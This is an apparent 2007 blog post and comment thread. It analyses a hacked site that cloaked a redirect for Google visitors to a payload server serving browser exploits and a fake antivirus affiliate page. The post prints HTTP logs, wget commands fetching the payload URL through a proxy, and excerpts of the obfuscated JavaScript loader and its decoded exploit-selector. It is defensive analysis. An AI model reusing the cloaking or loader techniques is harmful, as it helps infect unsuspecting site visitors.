The website hack you’d never find

Posted on 23 August 2007 at 22:03 UTC, filed under Hack, disclaimer

Warning: do not try the URLs here unless your system is locked down properly. I suggest using a virtual machine (I use VMware) to test things like this. The hack itself is complicated, the system behind it is simple – skip the complicated part if you’re in a hurry.

It all started with a posting like this:

When I do a google search for [Jonathan Wentworth Associates] the first result is:

Jonathan Wentworth Associates, LTD
Welcome to Jonathan Wentworth Associates, a respected resource for world-class orchestral soloists,
conductors, opera, chamber music, chamber orchestras, …
www.jwentworth.com/ – 19k – Cached – Similar pages – Note this

The “Jonathan Wentworth Associates, LTD” is highlighted and is a link to the web site. If you place the mouse over the link, it shows http://www.jwentworth.com. However, if you click the link it immediately attempts to download the trojan. My McAfee immediately blocked it.

Looking at the page in question, it doesn’t appear to be hacked; there are no injected scripts or anything of that kind. However, using LiveHTTPHeaders with Firefox while doing the same steps (search, click on the top result), you see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
HTTP/1.x 302 Found
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Location: http://www.jwentworth.com/

Without going through Google, the page is returned right away, just as it should be, and that is also what search engine crawlers get. Coming from Google, however, the site answers with a 302 redirect to a bare IP address, which in turn redirects back to the original site. The average browser won’t show that, but if you’re quick you might spot it in the status bar. A search engine crawler, or any user who typed in the address, gets there without a redirect and notices nothing.

Strange.

That deserves a closer look. What’s on that server, and how can I get to see it?

I had seen something similar a few months back which redirected me to an affiliate site the first time I went to that site through a Google referrer (in my case, the gmail.google.com referrer was enough). It would only trigger once per IP-Address. This looks like a similar hack.

When I was able to download the files, I had a nice collection of:

  • an obfuscated (“encrypted”) javascript file that downloaded exploits based on browser and operating system
  • an exploit from free-spy-cam.net
  • an affiliate sales page for an antivirus software. Oh the irony. “We just infected you, buy our antivirus to get clean.” That is, if that software isn’t infected with something else.
  • an affiliate signup link on that page

A search engine crawler will never see these things. A user coming in from Google gets redirected and, if the IP address is not yet known to the payload server, is hit with a few exploits chosen for that system and then shown an affiliate ad page. The next time the user comes, the redirect still happens, but the normal page is shown.

Spotting the hack on your site

It would be good to know how you could spot a hack like this on your site. In general, you can’t. You can check for this particular hack, but it might not trigger every time … not to mention that there are likely far too many variants of this that you would need to check for.

A simple check is to fetch the page with wget, pretending to be a browser coming from a Google search, and look for strange redirects, eg:

>wget --user-agent Firefox --save-headers --referer "http://www.google.com/search?q=duuude" "http://www.jwentworth.com/"

However, as mentioned, that might not work every time.

The technical details

(skip this part, if you are lost already :-) )

The original spotting of the anomaly was using LiveHTTPHeaders with Firefox, while doing the steps: search, click on the top result. You see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates

HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/
1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/5.0.2.2635.SR1.2 mod_ssl/
2.8.28 OpenSSL/0.9.7a
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:05 GMT
(…)
Location: http://www.jwentworth.com/

A strange redirect like that is a really bad sign. How can we fetch the URL it hands out and see what they are sending? Apparently the payload can only be triggered once per IP address, and I had already used up that chance earlier. In order to view the initial page, I had to find an IP address that was not yet registered with the remote server (at least that’s my explanation). I used a proxy server from one of the lists online. Using the proxy server and wget, I was able to access the page:

>set http_proxy=81.63.140.37:3128

>wget --user-agent "Firefox" --save-headers "http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2Findex%2Ehtml"

Connecting to 81.63.140.37:3128… connected.
Proxy request sent, awaiting response… 200 OK
Length: unspecified
20:43:23 (79.20 KB/s) – `ind.htm@src=324&surl=www.jwentworth.com&sport=80&suri=%
2Findex.html.2′ saved [414]

The page that was returned was a normal frameset:

  <HTML><HEAD><TITLE></TITLE></HEAD>
  <frameset framespacing="0" border="0" rows="*,1" frameborder="0">
  <frame name="m" src="/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt" scrolling="no" noresize marginwidth="0" marginheight="0">
  <frame name="b" src="about:blank" marginwidth="0" marginheight="0" scrolling="auto">
  <noframes><BODY>Frames not supported by your browser.</BODY></noframes>
  </frameset><body></body></html>

The second frame was kind of funny, “about:blank”? The first one was a bit more interesting though: http://85.255.117.38/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt
Notice the “trk” parameter.

Using Opera inside a VMware virtual machine running Windows 2000 (heh, paranoid is good), I was able to access that page. I saved it for analysis (and had Ethereal running on the side, just to be sure). A refresh returned a 404: the page could only be viewed once.

(screenshot: showhack.jpg)

Looking at the files you see some interesting things:

– an encrypted javascript file
– an exploit from free-spy-cam.net
– an affiliate sales page for the antivirus software
– an affiliate signup link on that page

The ZIP-File contains a full copy of the files as downloaded by the Opera browser. Check the files at your own risk, they contain the full exploit.

The encrypted javascript file looks like this (pulled apart and reformatted; called “__cntr000.htm” in the ZIP file):

  <script language=JavaScript>
  function dc(sed) {
    l=sed.length;
    var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,56,60,51,15,9,10,13,36 (...) 52,16);
    soot=sed;
    for(j=Math.ceil(l/b);j>0;j--) {
       r='';
       for(i=Math.min(l,b);i>0;l--,i--) {
         saam=t[soot.charCodeAt(p++)-48];
         sttp=saam<<s;w|=sttp;
  (...)
       dd1="document";
       dd2="write(r)";
       eval(dd1+"."+dd2)
  (...)
  dc("AVbFxuGqAk7s5OpH (...) G2ovPVoP9dATq_")
  </script>

The contents of the file are not really encrypted, just obfuscated with a Base64-like encoding: the lookup table t maps each character of the string to a 6-bit value, and the loop packs those bits back into bytes. You don’t need to understand the decoder to read the payload; let it run and intercept the result. Replace
eval(dd1+"."+dd2)
with
document.write("<xmp>" + r + "</xmp>");

Doing that will display the full contents of the encrypted data (called “__cntr000-decoded.htm” in the ZIP file).

  (...)
    var WinOS=Get_Win_Version(IEversion);
    PatchList = clientInformation.appMinorVersion;
    switch (WinOS)
    {
     case "wXPw":
      XP_SP2_patched=0;
      FullVersion=clientInformation.appMinorVersion;
      PatchList=FullVersion.split(";");
      for (var i=0; i < PatchList.length; i++) { if (PatchList[i]=="SP2") { XP_SP2_patched=1; } }
      if (XP_SP2_patched==1) { ExploitNumber=9; }
  (...)
      location.href="cnte-eshdvvw.htm?trk=zszuyhbinthnpzt";
  (...)

It is yet another piece of javascript that picks an exploit based on the operating system (it even tests for XP Service Pack 2) and the browser the user is running. The exploit page is also tagged with the “trk” parameter and couldn’t be downloaded separately. You can bet that it’s not a picture of your favorite celebrity, however.

Next steps

You could follow these up with:

  • Checking the whois of the payload server and notifying the hoster (in this case probably fruitless)
  • Checking the sales page, search for the affiliate ID and the setups running and complain to the affiliate networks about this webmaster
  • Mirror a copy of the original server for analysis
  • Obviously move to a different server, perhaps even a different hoster

Summary

The hacker had managed to patch the server-side code (most likely the Apache server itself or its configuration) so that
– search engines see the normal page
– new users from search engines are hacked with several exploits and shown an ad for anti-virus software

Spotting something like this on your own sites is close to impossible. The search engine crawlers would not notice anything.

Recognizing something like this algorithmically on Google’s side would be possible with the Google Toolbar data. Assuming all shown URLs are recorded, they could compare the URL clicked in the search results with the URL finally shown in the user’s browser (including the frames). The same setup could be used to detect almost any kind of cloaking.

Scary stuff.

There are 2 trackback pings to this post.
  1. [...] Der wohl sneaky-ste Website Hack bislang [...]

  2. [...] last time I wrote about a hacked site, it was using a redirect that sent some users to a different site. This kind of hack is pretty [...]

There are 16 comments to this post.
  1. I’m glad you are one of the good guys…you’ve got some scary skills in figuring things out.

  2. When I looked at this in your RSS feed in netvibes it redirected me to the infected site...

  3. @Patrick: that doesn’t sound too good, but since the exploit only triggers when a user comes from Google, it shouldn’t matter. Is Netvibes interpreting some of the markup? Did it really redirect or did it link to the site?

  4. I tried Netvibes – you don’t get redirected, but you see a part of the content here on their page (at least that’s what I see). I see the name of the person from the original posting on the netvibes page and then this blog entry opens up in a separate window. Maybe I was a bit too sneaky for my own good, I hid that name from indexing by using javascript to display it (so that this page doesn’t rank for his name). Apparently that javascript snippet is executed on the old page, before the redirect to the new window takes place. That could be a security issue in Firefox… (did you use Firefox as well?)

  5. I do use FF. It does just show the persons name at the top of the page.

  6. Good, then it’s not that bad :-) *big sigh of relief*

  7. Indeed rather scary stuff. Possibly one of the nastier exploits I’ve heard of recently.

    I think tracking down the aff codes might help – removing some of the financial gain would be a start. I’m sure the installed payload is also just as nasty given the lengths the hackers have gone to…

  8. Adding a little… You don’t need to use a proxy if you are on windows. Back when we looked at the other hacked site with this same exploit all I had to do was to repair the connection to get a new IP address. And every time after that, when checking LiveHTTPHeaders it triggered the 302.

  9. Great project!! You should be on Google payroll!

    John: “That could be a security issue in Firefox” :- given this would you recommend staying with Internet Explorer / Other for security reasons? I was considering Firefox due to repeated “IE not responding”.

    Do you think the antivirus advert (hidden hack redirect) was a joke or a moneyspinner or both?

    BTW FYI I found this page after visiting http://groups.google.com/group/Google_Webmaster_Help-Requests/browse_thread/thread/3238914c52ff7b18/3f4de587650273fc

    After an AVG activex thing popped up in ie7 while visiting a christianity page. I clicked no. Did that mean the page was triggering AVG or a virus pretending to? I ran AVG afterwards and it found a “virus identified exploit.ANI” in my temp. Did I prevent the virus spreading out of temp by clicking NO on the ActiveX request or prevent AVG catching it? What use is the thing in temp anyway?

    Just curious (re: spam protection on this page).. Sum of 7 + 4.. can see how me typing in 11 would partially suggest I was a human; but as 11 is already shown in the field does this mean SHOWING the question is redundant? My guess is prob’ no, but I’m so curious :)

    Brilliant work btw.. Tris.

  10. Hi John,

    I’m trying to solve a similar mystery. Can I PM you the URL and see if you have any ideas. I’m trying to trace a cloaked redirect…

  11. John,

    BTW I’ve found Fiddler very useful, but have hit a brick wall.

  12. Oh crap. I’ve been hacked by this.

    I was redirected to this page by a buddy of mine when I mentioned the problem I was having. A few months ago my site stats reported a 90% drop in hits which have all turned into 302 temporary redirect messages.

    What can I do to get rid of this??

  13. I found that some of the sites like this often deploy a cookie the first time you visit, then change it on a later visit. The contents of the cookie determine where they will redirect you.

    My impression was that their intent was to get their money by redirecting click traffic, and then using the virus page to scare away curious return snoopers.

    I also found the Microsoft Spam Double Funnel paper to be useful information http://research.microsoft.com/research/pubs/view.aspx?type=Technical%20Report&id=1269.

  14. I have a similar problem, noticed whenever I search google for my site from another computer I get this redirect to a lvhook.biz with an alert from avg about a trojan. Only once, then subsequent searches go straight to my site. Is this code hidden on my page somewhere? I reported the problem to my host, but they could find no problem on the server. I’d already worked out it was the google referer that triggered this, and searching found this page. Great work by the way.

  15. Update: I recreated the redirect by browsing through a proxy. I notified my hosting company… sent them the transcript on this page for them to read, and told them to inspect the http.conf file and to look for rewrites. They emailed me back after an hour informing me that they had found the malicious code and removed it, and also put measures in to stop it happening again. They were pretty shocked and surprised to say the least. So thank you for taking the time and effort to post here what happened to you, allowing us to benefit from your experience.

  16. John Burns (11 May 2011 at 9:25 pm):

    Hi, I am pretty sure I have this same hack. It is very tricky. I think it is on 3 of my websites. I clicked my link through google and was forwarded to an affiliate site for a competing company selling a similar product that I sell. I am willing to pay John Mu to do the research for me and find out. Everyone in my organization thinks I’m crazy and that it’s spyware on my computer. However, my buddy with a apple computer also searched on google and clicked through my link on google and ended up on the same redirected site, and he was using a Mac, I am on PC.

    It doesn’t do it all the time, only some times. And it’s not currently doing it right now, but I have seen it happen on multiple occasions. Please contact me I am willing to hire you John Mu to take a look and try to help me prove my organization wrong. They are telling me that it is spyware on my PC(which it could be) but I am almost certain that the website is hacked. Please contact me.
